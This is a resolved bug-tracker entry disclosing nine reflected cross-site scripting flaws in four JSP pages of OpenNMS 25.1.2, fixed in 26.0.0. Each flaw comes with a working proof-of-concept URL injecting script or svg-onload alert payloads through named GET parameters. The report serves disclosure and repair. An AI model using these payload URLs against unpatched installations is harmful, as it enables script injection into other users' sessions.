Details

    • Type: Sub-task
    • Status: Resolved (View Workflow)
    • Priority: Major
    • Resolution: Fixed
    • Affects Version/s: None
    • Fix Version/s: 26.0.0
    • Component/s: None
    • Security Level: Default (Default Security Scheme)
    • Labels:
      None
    • Sprint:
      Horizon 2020 - March 18th, Horizon 2020 - April 1st

      Description

      ##Reflected Cross-Site Scripting

      We found 9 reflected XSS issues in the following files of OpenNMS 25.1.2:

      load-assets.jsp:
      https://github.com/OpenNMS/opennms/blob/master/core/web-assets/src/main/assets/static/load-assets.jsp
      resultsIndexNoCount.jsp:
      https://github.com/OpenNMS/opennms/blob/master/opennms-webapp/src/main/webapp/includes/resultsIndexNoCount.jsp
      resultsIndex.jsp:
      https://github.com/OpenNMS/opennms/blob/master/opennms-webapp/src/main/webapp/includes/resultsIndex.jsp
      notification-box.jsp
      https://github.com/OpenNMS/opennms/blob/master/opennms-webapp/src/main/webapp/includes/notification-box.jsp

      ###1. load-assets.jsp
      There are 2 reflected XSS issues in the file `load-assets.jsp`
      Both issues can be triggered without authentication.

      The first issue can be exploited via the GET parameter `asset-async` by accessing the following URL:
      `http://192.168.56.102:8980/opennms/assets/load-assets.jsp?asset-async=a%22%3Ealert(1)//&asset-media=b&asset-defer=true&asset=vaadin-theme&asset=print.js&asset-type=js`

      The second issue can be exploited via the GET parameter `asset-media` by accessing the following URL:
      `http://192.168.56.102:8980/opennms/assets/load-assets.jsp?asset-async=&asset-media=b%22%3E%3Cscript%3Ealert(1)%3C/script%3E&asset-defer=true&asset=vaadin-theme&asset=print&asset-type=css`

      ###2. resultsIndexNoCount.jsp
      There are 3 XSS issues in the file `resultsIndexNoCount.jsp`. These issues require the victim to be authenticated.

      The first issue can be exploited via the GET parameter `multiplename` by accessing the following URL:
      `http://192.168.56.102:8980/opennms/includes/resultsIndexNoCount.jsp?itemCount=10&baseurl=2%22&multiplename=test%22%3E%3Csvg/onload=alert(1)%3E&multiple=1`

      The second issue can be exploited via the GET parameter `limitname` by accessing the following URL:
      `http://192.168.56.102:8980/opennms/includes/resultsIndexNoCount.jsp?itemCount=10&baseurl=2%22&limitname=test%22%3E%3Csvg/onload=alert(1)%3E&multiple=1`

      The third issue can be exploited via the GET parameter `baseurl` by accessing the following URL:
      `http://192.168.56.102:8980/opennms/includes/resultsIndexNoCount.jsp?itemCount=10&baseurl=test%22%3E%3Csvg/onload=alert(1)%3E&multiple=1`

      ###3. resultsIndex.jsp

      There are 3 XSS issues in the file `resultsIndex.jsp`. These issues require the victim to be authenticated.

      The first issue can be exploited via the GET parameter `multiplename` by accessing the following URL:
      `http://192.168.56.102:8980/opennms/includes/resultsIndex.jsp?count=10&baseurl=test&limit=9&multiplename=a%22%3E%3Csvg/onload=alert(1)%3E`

      The second issue can be exploited via the GET parameter `limitname` by accessing the following URL:
      `http://192.168.56.102:8980/opennms/includes/resultsIndex.jsp?count=10&baseurl=test&limit=9&limitname=a%22%3E%3Csvg/onload=alert(1)%3E`

      The third issue can be exploited via the GET parameter `baseurl` by accessing the following URL:
      `http://192.168.56.102:8980/opennms/includes/resultsIndex.jsp?count=10&baseurl=test%22%3E%3Csvg/onload=alert(1)%3E&limit=9`

      ###4. notification-box.jsp

      There is 1 XSS issue in the file `notification-box.jsp` and can be triggered via the GET parameter `node` by accessing the following URL:
      `http://192.168.56.102:8980/opennms/includes/notification-box.jsp?node=tset%22%3E%3Csvg/onload=alert(1)%3E`

      Information about fixing XSS issues can be found here:

      https://owasp.org/www-project-cheat-sheets/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html

        Attachments

          Activity

            People

            Assignee:
            patrick.schweizer Patrick Schweizer
            Reporter:
            patrick.schweizer Patrick Schweizer
            Votes:
            0 Vote for this issue
            Watchers:
            2 Start watching this issue

              Dates

              Created:
              Updated:
              Resolved: